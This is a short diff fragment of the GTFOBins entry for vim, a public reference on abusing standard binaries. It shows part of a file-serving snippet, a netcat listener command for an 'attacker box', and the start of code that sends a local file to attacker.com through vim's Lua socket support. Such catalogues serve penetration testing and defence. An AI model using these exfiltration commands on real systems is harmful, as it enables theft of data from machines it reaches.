GTFOBins/GTFOBins.github.io/_gtfobins/vim.md

         else: import SimpleHTTPServer as s, SocketServer as ss ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()
         vim.command(":q!")'
-    - description: Send a file to a TCP port.
+    - description: Send a local file via TCP.
 Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
 This requires that `vim` is compiled with Lua support and that `lua-socket` is installed.
       code: |
         export RHOST=attacker.com
         export RPORT=12345